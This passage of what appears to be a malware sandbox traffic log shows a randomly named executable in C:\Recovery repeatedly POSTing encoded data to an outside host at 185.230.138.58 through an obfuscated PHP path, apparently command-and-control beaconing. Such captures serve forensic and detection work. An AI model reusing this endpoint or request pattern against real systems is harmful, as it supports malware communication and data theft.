                                                                                                                                        Data Ascii: WUZX_BQQ[YQVYRX_VY]WZQ[I[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!,# ?#^&<&[)*">6Z*<<X&*<)T'.<\&4=$'^& X/


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        83192.168.2.449986185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:12.684247971 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1868
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:13.032830000 CET1868OUTData Raw: 57 53 5f 59 5a 43 54 53 5b 59 51 56 59 52 58 5e 56 5a 5d 5b 5a 5d 5b 48 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WS_YZCTS[YQVYRX^VZ][Z][H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!;T' ,#2Z:[>:W#>&*?$]2=+_('8X34*_0'^& X/
                                                                                                                                        Dec 21, 2024 10:09:13.934361935 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:14.168579102 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:13 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 26 05 36 25 37 10 26 2d 3b 52 25 2d 26 5c 2b 58 3b 5d 26 3c 31 45 37 30 24 15 2a 3c 33 5b 25 3d 29 07 24 5a 28 1f 3c 30 02 00 3a 0a 20 46 04 1c 23 1a 3f 30 32 53 3d 16 3b 01 3b 01 3a 02 3f 0c 04 5a 35 5a 2a 02 34 2e 36 5c 23 21 3a 0a 3f 00 2e 57 2a 1a 28 5f 39 00 3d 03 22 10 23 56 0b 1f 39 52 3e 23 31 00 26 27 23 06 26 34 2d 0d 23 35 2f 19 35 0c 37 56 35 13 38 05 27 28 0c 12 36 06 06 54 28 3f 39 07 32 07 0a 1d 2c 3d 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98&6%7&-;R%-&\+X;]&<1E70$*<3[%=)$Z(<0: F#?02S=;;:?Z5Z*4.6\#!:?.W*(_9="#V9R>#1&'#&4-#5/57V58'(6T(?92,=&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        84192.168.2.449991185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:13.105540037 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:13.451713085 CET1012OUTData Raw: 52 52 5f 51 5a 42 51 56 5b 59 51 56 59 5b 58 5e 56 5f 5d 5e 5a 59 5b 46 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RR_QZBQV[YQVY[X^V_]^ZY[F[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!C,##</Z%Z*Z(.&U7="^)Y7%+"<*40=;$*'*'^& X/,
                                                                                                                                        Dec 21, 2024 10:09:14.352902889 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:14.588644028 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:14 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        85192.168.2.449993185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:14.836165905 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:09:15.191886902 CET1012OUTData Raw: 52 50 5f 5a 5a 40 51 55 5b 59 51 56 59 5f 58 5e 56 5b 5d 5f 5a 58 5b 46 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RP_ZZ@QU[YQVY_X^V[]_ZX[F[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!G;23#/$1/").*S".-)?'28?:(&.3.X0'^& X/<
                                                                                                                                        Dec 21, 2024 10:09:16.082333088 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:16.316699982 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:15 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        86192.168.2.449998185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:16.554306984 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:16.905229092 CET1012OUTData Raw: 52 52 5a 5a 5a 45 51 5f 5b 59 51 56 59 53 58 5f 56 5a 5d 5f 5a 5e 5b 43 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RRZZZEQ_[YQVYSX_VZ]_Z^[C[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"/"(]!,/2?5).:4:=Y'%+6?7W''4=$:'^& X/
                                                                                                                                        Dec 21, 2024 10:09:17.798044920 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:18.032675982 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:17 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        87192.168.2.450002185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:18.551650047 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:18.906344891 CET1012OUTData Raw: 57 55 5f 59 5f 40 54 52 5b 59 51 56 59 59 58 5c 56 59 5d 5d 5a 5b 5b 48 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WU_Y_@TR[YQVYYX\VY]]Z[[H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!818\4,;^1!*.) >Z)Y$[28%]+:+S'> \34&X':'^& X/$


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        88192.168.2.450006185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:19.291310072 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1892
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:19.643573046 CET1892OUTData Raw: 52 54 5a 5b 5a 45 51 52 5b 59 51 56 59 52 58 50 56 59 5d 5c 5a 5e 5b 48 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RTZ[ZEQR[YQVYRXPVY]\Z^[H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX",1,Y7'&?*Z(-5#.>8&(/'X/$$)'*'^& X/
                                                                                                                                        Dec 21, 2024 10:09:20.539236069 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:20.772918940 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:20 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 25 5c 22 0b 37 1f 26 3d 01 11 27 00 31 04 2b 2e 27 16 26 3f 2d 08 34 0d 23 05 29 11 30 03 33 00 00 58 30 12 2c 55 2b 20 0d 10 2e 1a 20 46 04 1c 23 17 28 0d 0b 0f 2b 28 09 01 3b 5e 21 5f 2b 31 22 19 21 12 03 5c 23 10 29 05 23 21 08 0b 28 17 3e 52 29 37 3c 13 2f 3e 22 5d 21 2a 23 56 0b 1f 3a 0b 3e 0e 3a 58 24 27 20 58 31 09 39 09 20 40 34 0f 35 0c 2b 51 21 3e 37 5b 25 01 3e 12 35 06 3c 52 3d 2f 0f 02 32 39 24 57 39 07 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98%\"7&='1+.'&?-4#)03X0,U+ . F#(+(;^!_+1"!\#)#!(>R)7</>"]!*#V:>:X$' X19 @45+Q!>7[%>5<R=/29$W9&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        89192.168.2.450008185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:19.414319992 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:19.765413046 CET1012OUTData Raw: 57 55 5f 5b 5f 48 54 52 5b 59 51 56 59 53 58 5b 56 53 5d 5c 5a 5e 5b 44 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WU_[_HTR[YQVYSX[VS]\Z^[D[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!C-1$^4<(&[*-T#&=$1^>+)S3>$)3'^& X/
                                                                                                                                        Dec 21, 2024 10:09:20.661012888 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:20.896784067 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:20 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        90192.168.2.450012185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:21.162374973 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:09:21.514483929 CET1012OUTData Raw: 52 55 5f 58 5f 40 54 55 5b 59 51 56 59 5f 58 5e 56 5d 5d 5b 5a 5c 5b 48 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RU_X_@TU[YQVY_X^V]][Z\[H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"-"#7<7X&.[)7=5>28?$#'*^&:'^& X/<
                                                                                                                                        Dec 21, 2024 10:09:22.410541058 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:22.648855925 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:22 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        91192.168.2.450016185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:23.191066027 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:23.545593977 CET1012OUTData Raw: 52 52 5f 5e 5a 44 54 55 5b 59 51 56 59 5d 58 5c 56 59 5d 5b 5a 5c 5b 49 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RR_^ZDTU[YQVY]X\VY][Z\[I[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!G82\ ?7^&)-7.]>?Z%>):/V'>$$!$*'^& X/
                                                                                                                                        Dec 21, 2024 10:09:24.438186884 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:24.672782898 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:24 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        92192.168.2.450022185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:24.914875984 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:25.264586926 CET1012OUTData Raw: 52 53 5f 5d 5a 44 51 54 5b 59 51 56 59 53 58 5a 56 59 5d 59 5a 5b 5b 46 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RS_]ZDQT[YQVYSXZVY]YZ[[F[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!B/;!<+[&6*-#-6+?29X+/S$> 3$!&*'^& X/


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        93192.168.2.450027185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:09:25.906970978 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1892
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:09:26.264537096 CET1892OUTData Raw: 57 53 5f 5f 5a 45 51 50 5b 59 51 56 59 5f 58 5a 56 5e 5d 57 5a 5d 5b 49 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WS__ZEQP[YQVY_XZV^]WZ][I[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!F818\ Z$%*=-94=&_=?2&(7$>8_375$*'^& X/<
                                                                                                                                        Dec 21, 2024 10:09:27.157991886 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:09:27.397006035 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:09:27 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 26 00 21 0b 05 53 32 2d 34 0f 30 07 22 58 28 3e 24 06 27 3c 3a 19 37 33 23 05 3e 59 38 02 25 2d 35 05 24 3f 30 54 3f 30 24 01 2d 0a 20 46 04 1c 20 06 3f 33 32 1a 3e 28 2b 04 2c 38 3e 06 2b 1c 3d 04 36 05 3d 11 20 3e 36 14 37 0f 00 0d 3c 5f 26 50 28 24 3c 13 2e 3e 31 02 20 3a 23 56 0b 1f 39 57 2b 23 32 5b 33 37 33 07 32 0e 22 12 37 25 2f 56 21 21 37 57 35 3d 37 5b 26 5e 2a 11 35 3b 2b 0b 29 2c 3a 12 25 2a 20 54 3a 07 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98&!S2-40"X(>$'<:73#>Y8%-5$?0T?0$- F ?32>(+,8>+=6= >67<_&P($<.>1 :#V9W+#2[3732"7%/V!!7W5=7[&^*5;+),:%* T:&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        94192.168.2.450028185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
